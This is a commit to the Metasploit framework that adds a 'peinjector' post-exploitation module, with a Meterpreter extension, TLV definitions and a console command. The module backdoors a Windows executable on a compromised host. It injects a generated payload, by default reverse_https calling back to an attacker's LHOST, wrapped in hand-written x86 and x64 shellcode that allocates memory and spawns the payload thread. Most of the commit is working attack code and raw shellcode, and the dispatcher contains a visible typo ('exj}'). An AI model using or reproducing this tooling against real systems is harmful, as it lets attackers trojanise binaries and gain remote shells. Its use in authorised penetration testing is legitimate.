Add peinjector post module

GSoC/Meterpreter_Web_Console
alpiste 2017-09-19 20:21:42 -03:00 committed by bwatters-r7
parent 1d47b7f880
commit 2251c4a712
4 changed files with 477 additions and 0 deletions

View File

@ -0,0 +1,53 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/peinjector/tlv'
module Rex
module Post
module Meterpreter
module Extensions
module Peinjector
###
#
# This meterpreter extensions allow to inject a given shellcode into an executable file.
#
###
class Peinjector < Extension
def initialize(client)
super(client, 'peinjector')
client.register_extension_aliases(
[
{
'name' => 'peinjector',
'ext' => self
},
])
end
def inject_shellcode(opts={})
return nil unless opts[:shellcode]
request = Packet.create_request('peinjector_inject_shellcode')
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE, opts[:shellcode])
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE, opts[:size])
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64, opts[:isx64])
request.add_tlv(TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE, opts[:targetpe])
response = client.send_request(request)
error_msg = response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
raise error_msg if error_msg
return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
end
end
end; end; end; end; end

View File

@ -0,0 +1,19 @@
# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
module Extensions
module Peinjector
TLV_TYPE_PEINJECTOR_SHELLCODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64 = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
TLV_TYPE_PEINJECTOR_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
end
end
end
end
end

View File

@ -0,0 +1,80 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
require 'pry'
module Rex
module Post
module Meterpreter
module Ui
###
#
# Peinjector extension - inject a given shellcode into an executable file
#
###
class Console::CommandDispatcher::Peinjector
Klass = Console::CommandDispatcher::Peinjector
include Console::CommandDispatcher
#
# Name for this dispatcher
#
def name
'Peinjector'
end
#
# List of supported commands.
#
def commands
{
'injectpe' => 'Inject a shellcode into a given executable'
}
end
@@injectpe_opts = Rex::Parser::Arguments.new(
'-s' => [true, 'Specify the raw shellcode'],
'-h' => [false, 'Help banner']
)
def injectpe_usage
print_line('Usage: injectpe -s <raw shellcode> -e <remote file location>')
print_line
print_line('Inject a shellcode on the target executable.')
print_line(@@injectpe_opts.usage)
end
#
# Inject a given shellcode into a remote executable
#
def cmd_injectpe(*args)
if args.length == 0 || args.include?('-h')
injectpe_usage
return false
end
opts = {
shellcode: args.shift
}
@@injectpe_opts.parse(args) { |opt, idx, val|
case opt
when '-s'
opts[:shellcode] = val
end
exj}
result = client.peinjector.inject_shellcode(opts)
print_good("Command execution completed:\n#{result}")
end
end
end
end
end
end

View File

@ -0,0 +1,325 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/common'
class MetasploitModule < Msf::Post
include Msf::Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Peinjector',
'Description' => %q{
This module will inject a specified windows payload into a target executable.
},
'License' => MSF_LICENSE,
'Author' => [ 'Maximiliano Tedesco <maxitedesco1@gmail.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the targer executable.', "windows/meterpreter/reverse_https"]),
OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."])
], self.class)
end
# Run Method for when run command is issued
def run
session.core.use('peinjector')
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
# Check that the payload is a Windows one and on the list
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
return
end
# Set variables
pay_name = datastore['PAYLOAD']
lhost = datastore['LHOST']
lport = datastore['LPORT']
targetpe = datastore['TARGETPE']
opts = datastore['OPTIONS']
# Create payload
payload = create_payload(pay_name, lhost, lport, opts)
# Inject payload
inject_payload(payload,targetpe)
end
# Create a payload given a name, lhost and lport, additional options
def create_payload(name, lhost, lport, opts = "")
pay = client.framework.payloads.create(name)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
pay.datastore['EXITFUNC'] = 'thread'
pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
if not opts.blank?
opts.split(",").each do |o|
opt,val = o.split("=",2)
pay.datastore[opt] = val
end
end
# Validate the options for the module
pay.options.validate(pay.datastore)
return pay
end
def inject_payload(pay, targetpe)
begin
print_status("Generating payload")
raw = pay.generate
param = {}
if pay.arch.join == ARCH_X64
threaded_shellcode = add_thread_x64(raw)
param[:isx64] = true
else
threaded_shellcode = add_thread_x86(raw)
param[:isx64] = false
end
param[:shellcode] = threaded_shellcode
param[:targetpe] = targetpe
param[:size] = threaded_shellcode.length;
print_status("Injecting #{pay.name} into the executable #{param[:targetpe]}")
client.peinjector.inject_shellcode(param)
print_good("Successfully injected payload into the executable: #{param[:targetpe]}")
rescue ::Exception => e
print_error("Failed to Inject Payload to executable #{param[:targetpe]}!")
print_error(e.to_s)
end
end
def add_thread_x86(payload)
stackpreserve = "\x90\x90\x60\x9c"
shellcode = "\xE8\xB7\xFF\xFF\xFF"
shellcode += payload
thread = "\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B" +
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02" +
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" +
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B" +
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48" +
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0" +
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF" +
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D" +
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04" +
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB" +
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90" +
"\x5D\x90" +
"\xBE"
thread +=[shellcode.length - 5].pack("V")
thread += "\x90\x6A\x40\x90\x68\x00\x10\x00\x00" +
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90" +
"\x89\xF1"
thread += "\xeb\x44" # <--length of shellcode below
thread += "\x90\x5e"
thread += "\x90\x90\x90" +
"\xF2\xA4" +
"\xE8\x20\x00\x00" +
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06" +
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF" +
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5" +
"\x58\x58\x90\x61"
thread += "\xe9"
thread += [shellcode.length].pack("V")
return stackpreserve + thread + shellcode
end
def add_thread_x64(payload)
stackpreserve = "\x90\x90\x50\x53\x51\x52\x56\x57\x54\x55\x41\x50" +
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
stackrestore = "\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" +
"\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58"
stackpreserve = "\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50" +
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
shellcode2 += payload
shellcode1 = "\x90" + # <--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" + # jmp to allocate
# api_call
"\x41\x51" + # push r9
"\x41\x50" + # push r8
"\x52" + # push rdx
"\x51" + # push rcx
"\x56" + # push rsi
"\x48\x31\xD2" + # xor rdx,rdx
"\x65\x48\x8B\x52\x60" + # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" + # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" + # mov rdx,qword ptr[rdx+32]
# next_mod
"\x48\x8b\x72\x50" + # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" + # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" + # xor r9,r9
# loop_modname
"\x48\x31\xc0" + # xor rax,rax
"\xac" + # lods
"\x3c\x61" + # cmp al, 61h (a)
"\x7c\x02" + # jl 02
"\x2c\x20" + # sub al, 0x20
# not_lowercase
"\x41\xc1\xc9\x0d" + # ror r9d, 13
"\x41\x01\xc1" + # add r9d, eax
"\xe2\xed" + # loop until read, back to xor rax, rax
"\x52" + # push rdx ;Save the current position in the module list
"\x41\x51" + # push r9 ; Save the current module hash for later
# ; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" + # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" + # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" + # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" + # test rax, rax ; Test if no export address table
"\x74\x67" + # je get_next_mod1 ; If no EAT present, process the nex
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
"\x50" + # push rax ; Save the current modules EAT
"\x8b\x48\x18" + # mov ecx, dword [rax+24] ; Get the number of function
"\x44\x8b\x40\x20" + # mov r8d, dword [rax+32] ; Get the rva of the function
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
# get_next_func: ;
"\xe3\x56" + # jrcxz get_next_mod; When we reach the start of the EAT
"\x48\xff\xc9" + # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" + # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" + # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" + # xor r9, r9 ; Clear r9 which will store the hash
# ; And compare it to the one we wan
# loop_funcname: ;
"\x48\x31\xc0" + # xor rax, rax ; Clear rax
"\xac" + # lodsb ; Read in the next byte of the ASCII funct name
"\x41\xc1\xc9\x0d" + # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" + # add r9d, eax ; Add the next byte of the name
"\x38\xe0" + # cmp al, ah ; Compare AL to AH (null)
"\x75\xf1" + # jne loop_funcname ; continue
"\x4c\x03\x4c\x24\x08" + # add r9, [rsp+8] ; Add the current module hash
"\x45\x39\xd1" + # cmp r9d, r10d ; Compare the hash
"\x75\xd8" + # jnz get_next_func ; Go compute the next function hash
"\x58" + # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" + # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" + # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" + # mov r8d, dword [rax+28] ; Get the funct addr table rva
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" + # mov eax, dword [r8+4*rcx]; Get the desired func RVA
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
# finish:
"\x41\x58" + # pop r8 ; Clear off the current modules hash
"\x41\x58" + # pop r8 ;Clear off the curr position in the module list
"\x5E" + # pop rsi ; Restore RSI
"\x59" + # pop rcx ; Restore the 1st parameter
"\x5A" + # pop rdx ; Restore the 2nd parameter
"\x41\x58" + # pop r8 ; Restore the 3rd parameter
"\x41\x59" + # pop r9 ; Restore the 4th parameter
"\x41\x5A" + # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" + # sub rsp, 32 ; reserve space for the register params
"\x41\x52" + # push r10 ; push back the return address
"\xFF\xE0" + # jmp rax ; Jump into the required function
# get_next_mod: ;
"\x58" + # pop rax ; Pop off the current modules EAT
# get_next_mod1: ;
"\x41\x59" + # pop r9 ; Pop off the current modules hash
"\x5A" + # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" + # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
# allocate
shellcode1 += "\x5d" + # pop rbp
"\x49\xc7\xc6" # mov r14, 1abh size of payload...
shellcode1 += [shellcode2.length - 5].pack("V")
shellcode1 += "\x6a\x40" + # push 40h
"\x41\x59" + # pop r9 now 40h
"\x68\x00\x10\x00\x00" + # push 1000h
"\x41\x58" + # pop r8.. now 1000h
"\x4C\x89\xF2" + # mov rdx, r14
"\x6A\x00" + # push 0
"\x59" + # pop rcx
"\x68\x58\xa4\x53\xe5" + # push E553a458
"\x41\x5A" + # pop r10
"\xff\xd5" + # call rbp
"\x48\x89\xc3" + # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
shellcode1 += "\x48\xc7\xc1"
shellcode1 += [shellcode2.length - 5].pack("V")
shellcode1 += "\xeb\x43"
# got_payload:
shellcode1 += "\x5e" + # pop rsi ; Prepare ESI with the source
"\xf2\xa4" + # rep movsb ; Copy the payload to RWX memo
"\xe8\x00\x00\x00\x00" + # call set_handler ; Configure error handling
# set_handler:
"\x48\x31\xC0" + # xor rax,rax
"\x50" + # push rax ; LPDWORD lpThreadId (NULL)
"\x50" + # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" + # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" + # mov rdx, rax ; LPTHREAD_START_ROUTINE (payload)
"\x49\x89\xD8" + # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" + # mov rcx, rax ; LPSECURITY_ATTRIBUTES (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" + # mov r10, 0x160D6838 ; hash("kernel32.dll","CreateThread")
"\xFF\xD5" + # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" + # add rsp, 50
# stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" +
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
shellcode1 += "\xe9"
shellcode1 += [shellcode2.length].pack("V")
return stackpreserve + shellcode1 + shellcode2
end
end